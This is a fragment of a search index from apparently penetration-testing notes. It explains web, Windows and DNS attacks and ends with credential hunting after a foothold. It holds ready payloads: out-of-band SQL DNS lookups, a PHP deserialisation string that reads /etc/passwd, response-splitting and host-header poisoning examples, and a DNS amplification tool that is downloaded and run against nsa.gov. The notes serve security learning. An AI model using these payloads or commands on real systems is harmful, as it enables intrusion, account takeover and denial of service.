Concatenation"},"106":{"body":"Replace delay with the desired delay in seconds. 
Database | Delay Syntax ---------| ------------ Oracle| dbms_pipe.receive_message(('a'),delay) Microsoft| WAITFOR DELAY 'hours:minutes:seconds' PostgreSQL| SELECT pg_sleep(delay) MySQL| SELECT sleep(delay)","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » Unconditional Time Delays","id":"106","title":"Unconditional Time Delays"},"107":{"body":"Database Lookup Syntax Oracle SELECT UTL_INADDR.get_host_address('domain') - requires elevated privileges Microsoft exec master..xp_dirtree '//domain/a' PostgreSQL copy (SELECT '') to program 'nslookup domain MySQL These work only on Windows LOAD_FILE('\\\\\\\\domain\\\\a') SELECT ... INTO OUTFILE '\\\\\\\\domain\\a'","breadcrumbs":"Exploitation » Web » SQL Injection » Cheatsheets » DNS Lookups","id":"107","title":"DNS Lookups"},"108":{"body":"Template Injection occurs when an attacker injects malicious template code into an input field and the templating engine doesn't sanitise the input. As such, the expression provided by the attacker may be evaluated and can lead to all sorts of nasty vulnerabilities such as RCE.","breadcrumbs":"Exploitation » Web » Template Injection » Overview","id":"108","title":"Overview"},"109":{"body":"SSTI occurs when the injection happens on the server-side. Templating engines are associated with different programming languages, so you might be able to execute code in that language when SSTI occurs. Testing for SSTI is template engine-dependent because different engines make use of a different syntax. It is, however, common to see templates enclosed in two pairs of {{}}. You should look for places in a webpage where user input is reflected. If you inject {{7*'7'}} and see 49 or 7777777 somewhere, then you know you have SSTI. This syntax isn't standard. 
You will need to identify the running template engine and use the correct syntax.","breadcrumbs":"Exploitation » Web » Template Injection » Server-Side Template Injection","id":"109","title":"Server-Side Template Injection"},"11":{"body":"","breadcrumbs":"Reconnaissance » Introduction","id":"11","title":"Introduction"},"110":{"body":"This vulnerability occurs in client template engines, which are written in Javascript. Such engines are Google's AngularJS and Facebook's ReactJS. CSTI typically occur in browser, so they typically cannot be used for RCE, but may be exploited for XSS. This can be difficult, since most engines do a good job at sanitising input and preventing XSS. When interacting with ReactJS, you should look for dangerouslySetInnerHTML function calls where you can modify the input. This function intentionally bypasses React's XSS protections. AngularJS versions before 1.6 include a sandbox in order to limit the available Javascript functions, but bypasses have been found. You can check the AngularJS version by typing Angular.version in the developer console. A list of bypasses can be found at https://pastebin.com/xMXwsm0N, however, more are surely available online.","breadcrumbs":"Exploitation » Web » Template Injection » Client-Side Template Injection","id":"110","title":"Client-Side Template Injection"},"111":{"body":"Open redirect vulnerabilities occur when a target visits a website which sends their browser to another URL. 
These attacks only redirect users and as such are often considered to be of low severity.","breadcrumbs":"Exploitation » Web » Open Redirect » Overview","id":"111","title":"Overview"},"112":{"body":"Open redirects occur when a developer mistrusts user input, which redirects to another site, usually via a URL parameter, HTML tags, or the DOM window location property.","breadcrumbs":"Exploitation » Web » Open Redirect » How Do They Work","id":"112","title":"How Do They Work"},"113":{"body":"Suppose that Google could redirect users to their Gmail service via the following URL: https://www.google.com/?redirect_to=https://www.gmail.com In this case, visiting www.google.com would result in your browser sending an HTTP request to the Google web server. The server would process this request and return a status code - typically 302, although it may sometimes be 301, 303, 307, or 308. This code would inform the browser that the page has been found, however, it would also tell it to make an additional HTTP request to www.gmail.com. This will be noted in the Location: header of the HTTP response. This header specifies where to redirect GET requests. An attacker could change the value of the redirect_to parameter and forward you to their malicious server. Common redirection parameter names include url=, redirect=, next=, however, they may also be denoted by a single letter at times.","breadcrumbs":"Exploitation » Web » Open Redirect » URL Parameter Redirect","id":"113","title":"URL Parameter Redirect"},"114":{"body":"HTML tags can tell a browser to reload a page and make a GET request to a specified URL. This URL is defined in the tag's content attribute. This is an example of such a tag: First, the content attribute defines the number of seconds the browser should wait before making the request to the URL. 
Secondly, it specifies the URL to make the request to.","breadcrumbs":"Exploitation » Web » Open Redirect » Meta Refresh Tag Redirect","id":"114","title":"Meta Refresh Tag Redirect"},"115":{"body":"Open redirects can be exploited by modifying the window's location property through the Document Object Model. This property denotes where a request should be redirected to. An attacker may change the location property through any of the following ways: window.location = https://www.google.com/ window.location.href = https://www.google.com window.location.replace(https://www.google.com) This type of open redirect is usually chained with some sort of XSS.","breadcrumbs":"Exploitation » Web » Open Redirect » Javascript Redirect","id":"115","title":"Javascript Redirect"},"116":{"body":"PHP Object Injection is a type of an insecure deserialisation attack which can result in arbitrary code execution.","breadcrumbs":"Exploitation » Web » PHP Object Injection » Introduction","id":"116","title":"Introduction"},"117":{"body":"PHP Magic Methods are a set of reserved methods for PHP objects which can be defined and which are automatically invoked in certain situations. Whilst it is possible to achieve code execution entirely by using normal methods on objects, magic methods can make the process easier.","breadcrumbs":"Exploitation » Web » PHP Object Injection » Magic Methods","id":"117","title":"Magic Methods"},"118":{"body":"PHP has functionally which allows arbitrary objects to be turned into strings and then later retrieved as objects from those same strings. This is achieved through the serialize() and unserialize() functions. When an adversary has control over the object which gets deserialised, they can manipulate the input in such a way to make the PHP script perform arbitrary actions. 
name = \"cr0mll\";\n$user->isAdmin = False; echo serialize($user);\n?> The serialisation string follows the type:data paradigm and has the following structure: Type Format Boolean b:value Integer i:value Float d:value String s:length:\"value\" Array a:size:{values} Object O:name_length:\"Class_name\":number_of_properties:{properties}","breadcrumbs":"Exploitation » Web » PHP Object Injection » Serialisation","id":"118","title":"Serialisation"},"119":{"body":"Deserialisation is the inverse operation - the unserialize() function takes a string and converts it to a PHP object (or normal variable). When the string passed to unserialize() is user-controlled, an adversary can craft a custom string which will result in an object with values of the attacker's choice. When these values are later used by the PHP application, they can alter its behaviour. Take a look at the following example: filename); }\n} class User\n{ public $name; public $isAdmin;\n} $user = unserialize($_POST['user']); if $user->isAdmin\n{ echo $user->name . \" is an admin.\\n\"\n}\nelse\n{ echo $user->name . \" is not an admin.\\n\"\n}\n?> In order to achieve arbitrary code execution, object injection relies on PHP Gadgets - pieces of code (typically classes) that the PHP script has access to. Usually, PHP code runs in some sort of a framework - when this is true, it is rather easy to find gadgets. Here, however, we do not have that luxury. The User class is only a storage container - it has no functionality. On the other hand, the LoadFile class can do some stuff. It has the __tostring magic method defined and it returns the contents of the file with the provided filename. We can manipulate the user object. Therefore, it is possible to set its name to an object - namely a LoadFile object with the file name set to anything we like. When the server receives this malicious user with an embedded LoadFile object, it is going to attempt to turn it into a string when echo is called. 
The embedded LoadFile object has its filename set to /etc/passwd for example, and so file_get_contents() is going to read this file, return its contents as a string and echo will print them out for us. Here is the exploit code: filename); }\n} class User\n{ public $name; public $isAdmin;\n} $obj = new LoadFile();\n$obj->filename = \"/etc/passwd\"; $user = new User();\n$user->name = $obj;\n$user->isAdmin = true; echo serialize($user);\n?> When we run this, we get the following serialisation string for the malicious user: O:4:\"User\":2:{s:4:\"name\";O:8:\"LoadFile\":1:{s:8:\"filename\";s:11:\"/etc/passwd\";}s:7:\"isAdmin\";b:1;} If we send it in a post request to the server, it will retrieve /etc/passwd for us:","breadcrumbs":"Exploitation » Web » PHP Object Injection » Deserialisation","id":"119","title":"Deserialisation"},"12":{"body":"Network scanning is the process of gathering information about a target via comlex reconnaissance techniques. The term \"network scanning\" refers to the procedures used for discovering hosts, ports, running services and information about the underlying OS type.","breadcrumbs":"Reconnaissance » Enumeration » Overview","id":"12","title":"Overview"},"120":{"body":"Never allow direct user control over the data passed to unserialize().","breadcrumbs":"Exploitation » Web » PHP Object Injection » Prevention","id":"120","title":"Prevention"},"121":{"body":"PHAR is the PHP Archive format and can allow for object injection even when there is no direct unserialize() call - provided that there is a way to upload a file to the server. Phar archives require neither a specific extension nor a set of magic bytes for identification which makes them especially useful for bypassing file upload filters. 
The format of the archive is the following: Stub - must contain Manifest Metadata - contains the serialised data Contents - the archive contents Signature - for integrity verification You would be quick to think that you can just inject code into the stub and it will be executed, but that is not the case. Where the stub really shines is the fact that it can contain anything before the part. This means that the stub can be used to imitate other file formats. Under the hood, PHAR stores metadata in a PHP-serialised format which needs to be deserialised when PHP uses the archive. In order for this to happen, the server needs to access the archive using the phar:// stream wrapper. It is for this reason that a way of uploading files to it is necessary.","breadcrumbs":"Exploitation » Web » PHP Object Injection » PHAR Files","id":"121","title":"PHAR Files"},"122":{"body":"If you try generating a phar file using PHP, you will likely run into the following error: In this case, you will need to set phar.readonly = Off in your /etc/php//cli/php.ini file (this is not required on the server, only on your machine). Afterwards, you can use the following code to generate the phar file: startBuffering(); $prefix = ...; # The data used for imitating another file format\n$phar->setStub($prefix . \"\"); $payload = ...; # Object injection payload\n$phar->setMetadata(serialize($payload)); $phar->addFromString(\"test.txt\", \"test\"); # Optional\n$phar->stopBuffering();\n?> The extension of the file can then be changed to anything. Subsequently, the file will need to be uploaded to the server. Once it is there, a way to make the server perform a file operation with phar:// is required. Additionally, there are a few caveats which need to be taken into account. The payload inside the object injection chain may only use the __wakeup() and __destruct() magic methods. 
Moreover, any file paths inside it must be absolute because phar files deal with context in a weird way when they are loaded.","breadcrumbs":"Exploitation » Web » PHP Object Injection » Generating the Payload","id":"122","title":"Generating the Payload"},"123":{"body":"The only way to completely prevent phar file abuse is to disable the phar:// stream wrapper altogether: stream_wrapper_unregister('phar');","breadcrumbs":"Exploitation » Web » PHP Object Injection » Prevention","id":"123","title":"Prevention"},"124":{"body":"HTTP Response Splitting occurs when user-provided input isn't sanitised and CRLFs are injected into HTTP responses. This is usually done through URL parameters. This type of attack typically requires social engineering or at least some user interaction. HTTP responses consist of message headers and a message body. The headers are separated from the body with 2 CRLFs - \\r\\n\\r\\n. An attacker could inject this character sequence into a header and terminate the header section - this could result in XSS, since anything after the 2 CRLFs will be treated as HTML. Imagine a custom header X-Name: Bob which is set via a parameter in a GET request called name. If input isn't properly sanitised, an attacker could craft the following URL which would result in XSS: ?name=Bob%0d%0a%0d%0a In other cases, HTTP response splitting may be used to send two responses to a single request by injecting the second response into the first one. A URL like the following could change the contents of a legitimate page that the target visits: application.com/redir.php?lang=hax%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%d%aContent-Length:%2019%0d%0aHacked All the target needs to do is visit the URL.","breadcrumbs":"Exploitation » Web » HTTP Response Splitting » Introduction","id":"124","title":"Introduction"},"125":{"body":"Certain vulnerabilities allow the attacker to input encoded characters that possess special meanings in HTML and HTTP responses. 
Usually, such input is sanitised by the application; sometimes, however, application developers simply forget to implement sanitisation or don't do it properly. Carriage Return (CR - \\r) and Line Feed (LF - \\n) can be represented with the following encodings, respectively - %0D and %0A. CRLF injection occurs when a user manages to submit a CRLF (a new line) into an application. These vulnerabilities might be pretty minor, but might also be rather critical. The most common CRLF injections include injecting content into files on the server-side such as log files. Through cleverly crafted messages, an attacker could add fake error entries to a log and therefore make a system admin spend time looking for an issue that doesn't exist. This isn't really powerful in itself and is rather akin to pure trolling. Sometimes, however, CRLF may lead to HTTP Response Splitting.","breadcrumbs":"Exploitation » Web » CRLF Injection » Overview","id":"125","title":"Overview"},"126":{"body":"Cross-site scripting (XSS) describes a set of attacks where an adversary injects Javascript into a web application, typically because user input isn't properly sanitised. It is similar to HTML injection, however, it allows for the execution of Javascript code and that makes it a potentially critical vulnerability. There are 3 main types of XSS and the difference between them lies in the way the injected code reaches the end user.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Overview","id":"126","title":"Overview"},"127":{"body":"This is the most severe type of XSS. The injected Javascript is sent to the server and the server stores it, for example in a database. When another user goes to retrieve the page that the attacker injected into, the JavaScript is also sent to the user as part of that page and is executed by their browser. 
For example, if you can inject into the username field of a user sign-up form, then any other users who visit your user profile later will be prompted with an alert box saying \"XSS\".","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Stored XSS","id":"127","title":"Stored XSS"},"128":{"body":"Blind XSS is a subset of stored XSS attacks where the injected script is stored by the server in a different part of the application to which you don't have direct access and thus can't directly see if your XSS attempt was successful. For example, if the application allows you to send a message to the support team and you can inject into it, the XSS will be executed once the admin panel is visited by a member of the support staff.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Blind XSS","id":"128","title":"Blind XSS"},"129":{"body":"Reflected XSS occurs when a server receives data which it then includes in its reply to the submitted request. This is typically exploited by creating a malicious link containing a script inside it and then tricking a user into visiting that URL. 
Suppose there is a search bar somewhere in the application, the contents of which are sent as a URL parameter in a GET request when a user clicks the search button and are then displayed on the response page in a similar manner: Search results for: The request could be to the following example URL: example.com/?search=val If your application is vulnerable to XSS, the attacker could craft a malicious URL like the following one: example.com/?search= This would inject the Javascript as HTML into the on the response page and the browser would then execute the code.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Reflected XSS","id":"129","title":"Reflected XSS"},"13":{"body":"","breadcrumbs":"Reconnaissance » Enumeration » Types of scanning","id":"13","title":"Types of scanning"},"130":{"body":"DOM-based XSS is a type of XSS where the malicious code is never sent to the server. This commonly occurs when using the fragment part of a URL, or by referencing document.URL / document.location.href. This is a less common attack nowadays, since most browsers automatically escape Javascript in address bars, so DOM-based XSS will only work if you unescape it. Suppose you have a page on http://127.0.0.1:8080/example.html You can add fragments to the URL with a # symbol. http://127.0.0.1:8080/example.html#test=val The fragment part (#test=val) is never sent to the server - it is only available locally. Suppose you had the following client-side Javascript code running: const pos = document.URL.indexOf(\"test=\") + 5;\nconst value = document.URL.substring(pos, document.URL.length); document.write(value); An attacker could craft the following URL: http://127.0.0.1:8080/example.html#test= However, if a victim clicks on this link, no Javascript should be injected, since the browser would usually automatically escape it - you would get %3Cscript%3Ealert('xss')%3C/script%3E printed on the page. 
If, however, the Javascript is decoded by the client-side code, it will get executed.","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » DOM-based XSS","id":"130","title":"DOM-based XSS"},"131":{"body":"You should try different XSS payloads within every user input field you might find. It is useful to use BurpSuite for that because you might be able to inject into more obscure fields such as drop-down menus by using a proxy. You should also be aware that not only can you use the . When injected, the page's source code would look like this .","breadcrumbs":"Exploitation » Web » Cross-Site Scripting (XSS) » Hunting for XSS","id":"131","title":"Hunting for XSS"},"132":{"body":"Cross-Site Request Forgery (CSRF) is a type of attack used to trick the victim into sending a malicious request. It utilises the identity and privileges of the target in order to perform an undesired action on the victim's behalf. It is similar to indirect impersonation - you can make the victim's browser submit requests as the victim. It is called \"cross-site\" because a malicious website can make the victim's browser send a request to another website. This attack typically relies on the victim being authenticated - either through cookies or basic header authorization.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » Overview","id":"132","title":"Overview"},"133":{"body":"There are two primary types of CSRF - through GET requests and through POST requests (although methods like PUT and DELETE may also be exploitable). When your browser submits a request to a web server, it also sends along all stored cookies. If CSRF occurs, any authentication cookies will be sent with the request and as such, any actions on the server would be performed on the victim's behalf. 
Note that in order for CSRF to work, the victim needs to be logged in because when you make a log out request, the web server usually returns an HTTP response which auto-expires your authentication cookies and they are no longer valid. In order for it to work, the victim would need to visit your malicious website.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » How does it work","id":"133","title":"How does it work"},"134":{"body":"This typically relies on hidden images through the HTML tag. This tag takes an src attribute which will tell the victim's browser to perform a GET request to the specified URL in order to retrieve an image. However, an attacker can change this URL and even add parameters to it, so that the browser performs a GET request to any arbitrary site. An example of such a malicious hidden image could be this: When visiting your malicious site, this will make the victim's browser submit a GET request. Any cookies stored for bank.com would be sent along, including any authentication ones. As such, the bank would complete the transfer from the victim's account.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » The GET scenario","id":"134","title":"The GET scenario"},"135":{"body":"If the bank uses POST requests for transfers, the method won't work because image tags can't initiate POST requests. This can however be achieved through hidden forms.
    Normally, the submission of the form will require that a user clicks the submit button, but this can be automated through Javascript. The response from the submission of the POST request would be redirected to the non-displayed iframe and so the victim would never see what has happened.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » The POST scenario","id":"135","title":"The POST scenario"},"136":{"body":"","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » Preventions","id":"136","title":"Preventions"},"137":{"body":"Sometimes, websites will make use of two-part tokens called CSRF tokens in order to prevent cross-site request forgery. These tokens are generated on the server - one part is sent to the user and the other is kept private. This value is submitted with the request and validated on the server. If the CSRF token isn't correct, the server shouldn't fulfill the submission. These tokens may be part of the POST request's body or as custom HTTP headers. They may take on any name, but some common ones include CSRF, CSRFToken, X-CSRF-TOKEN, form-id, lt, lia-token, etc. You should always try removing or altering the CSRF token in order to check if it's properly implemented.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » CSRF Tokens","id":"137","title":"CSRF Tokens"},"138":{"body":"When a browser sends an application/json POST request to a site, it will send an OPTIONS request beforehand. The site then returns a response indicating which types of HTTP requests the server accepts and from what trusted origins. Such OPTIONS requests are called preflight OPTIONS requests. CORS, or Cross-Origin Resource Sharing, restricts resource access, including access to JSON responses, from domains outside the one which served the file, unless such access is allowed by the site being tested. When CORS is used, submitting application/json requests is not possible, unless the website explicitly allows them. 
These protections can sometimes be bypassed by changing the content-type header to application/x-www-form-urlencoded, multipart/form-data, or text/plain. Browsers don't send preflight OPTIONS requests for any of these content types and CSRF requests might succeed.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » CORS","id":"138","title":"CORS"},"139":{"body":"Checking the Origin header (or the Referer header, if the Origin header isn't present) prevents CSRF because these headers are controlled by the browser and cannot be altered by the attacker.","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » Origin and Referer Headers","id":"139","title":"Origin and Referer Headers"},"14":{"body":"Lists the open ports and the services running on them. Port scanning describes the process of querying the running services on a computer by sending a stream of messages in an attempt to identify the service in question, as well as any information related to it. It involves probing TCP and UDP ports of a target system in order to determine if a service is running / listening.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning","id":"14","title":"Port Scanning"},"140":{"body":"This attribute can take on the values strict or lax. When set to strict, the browser won't send that specific cookie with any request that doesn't originate from the correct website - including GET requests. 
Setting the attribute to lax will prevent the cookie from being sent on normal subrequests (such as loading images or frames), however, the cookie will still be sent with direct requests to the origin site (such as those initiated by clicking on a link).","breadcrumbs":"Exploitation » Web » Cross-Site Request Forgery » samesite Cookie Attribute","id":"140","title":"samesite Cookie Attribute"},"141":{"body":"","breadcrumbs":"Exploitation » Web » WebSockets","id":"141","title":"Exploitation"},"142":{"body":"HTTP Parameter Pollution describes the set of techniques used for manipulating how a server handles parameters in an HTTP request. This vulnerability may occur when duplicate or additional parameters are injected into an HTTP request and the website trusts them. Usually, HPP (HTTP Parameter Pollution) vulnerabilities depend on the way the server-side code handles parameters.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Overview","id":"142","title":"Overview"},"143":{"body":"You send the server unexpected data, trying to make the server give an unexpected response. A simple example could be a bank transfer. Suppose your bank performs transfers on its website through the use of HTTP parameters. These could be a recipient= parameter for the receiving party, an amount= parameter for the amount to send in a specific currency, and a sender= parameter for the one who sends the money. 
A URL for such a transfer could look like the following: https://www.bank.com/transfer?sender=abcdef&amount=1000&recipient=ghijkl It may be possible that the bank server assumes it will only ever receive a single sender= parameter, however, submitting two such parameters (like in the following URL), may result in unexpected behaviour: https://www.bank.com/transfer?sender=abcdef&amount=1000&recipient=ghijkl&sender=ABCDEF An attacker could send such a request in hopes that the server will perform any validations with the first parameter and actually transfer the money from the second account specified. When different web servers see duplicate parameters, they handle them in different ways. Even if a parameter isn't sent through the URL, inserting additional parameters may still cause unexpected server behaviour. This is especially the case with server code which handles parameters in arrays or vectors through indices. Inserting additional parameters at different places in the URL may cause reordering of the array values and lead to unexpected behaviour. An example could be the following: https://www.bank.com/transfer?amount=1000&recipient=ghijkl The server would deduce the sender on the server-side instead of retrieving it from an HTTP request. Normally, you wouldn't have access to the server code, but for a POC I have written a simple server in a pseudo-code (no particular language). sender.id = abcdef function init_transfer(params)\n{ params.push(sender.id) // the sender.id should be inserted at params[2] prepare_transfer(params)\n} function prepare_transfer(params)\n{ amount = params[0] recipient = params[1] sender = params[2] transfer(amount, recipient, sender)\n} Two functions are created here, init_transfer and prepare_transfer, which take a params vector. The latter also invokes a transfer function, the contents of which are currently out of scope. Following the above URL, the amount parameter would be 1000 and the recipient would be ghijkl. 
The init_transfer function adds the sender.id to the parameter array. Note that the program expects the sender ID to be the 3rd (2nd index) parameter in the array in order to function properly. Finally, the transfer params array should look like this: [1000, ghijkl, abcdef]. Now, an attacker could make a request to the following URL: https://www.bank.com/transfer?amount=1000&recipient=ghijkl&sender=ABCDEF In this case, sender= would be included in the parameter vector in its initial state (before the init_transfer function is invoked). This means that the params array would look like this: [1000, ghijkl, ABCDEF]. When init_transfer is called, the sender.id variable would be appended to the vector and so it would look like this: [1000, ghijkl, ABCDEF, abcdef]. Unfortunately, the server still expects that the correct sender would be located at params[2], but that is no longer the case since we managed to insert another sender. As such, the money would be withdrawn from ABCDEF and not abcdef.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Server-Side HPP","id":"143","title":"Server-Side HPP"},"144":{"body":"These vulnerabilities allow the attacker to inject extra parameters in order to alter the client-side. An example of this is included in the following presentation: https://owasp.org/www-pdf-archive/AppsecEU09_CarettoniDiPaola_v0.8.pdf. The example URL is http://host/page.php?par=123%26action=edit The example server code is the following: .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Here, the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is viewed as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php? 
action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate parameters.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"144","title":"Client-Side HPP"},"145":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or Host: dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"145","title":"Introduction"},"146":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. Typically, applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. 
When the user clicks the link in their email, the token in the URL is used by the server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned, be it to determine whether they are spam or whether they contain a virus, and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"146","title":"Password Reset Poisoning"},"147":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forwarded-Host header. 
Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"147","title":"Prevention"},"148":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"148","title":"Windows"},"149":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"149","title":"Introduction"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"150","title":"The Attack"},"151":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"151","title":"DNS"},"152":{"body":"A DNS (Traffic) Amplification attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. 
It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"152","title":"What is DNS Traffic Amplification?"},"153":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"153","title":"How does it work?"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"154","title":"Conducting a DNS Traffic Amplification Attack"},"155":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"155","title":"Testing a DNS server for attack surface"},"156":{"body":"A simple tool is available only as a proof of concept here . 
You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IP's of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"156","title":"Executing the attack"},"157":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. 
The system stores information there about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning. The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter. Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"157","title":"Introduction"},"158":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"158","title":"Post Exploitation"},"159":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"159","title":"Introduction"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for reused credentials. You should try every password you have gathered on all users; you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. 
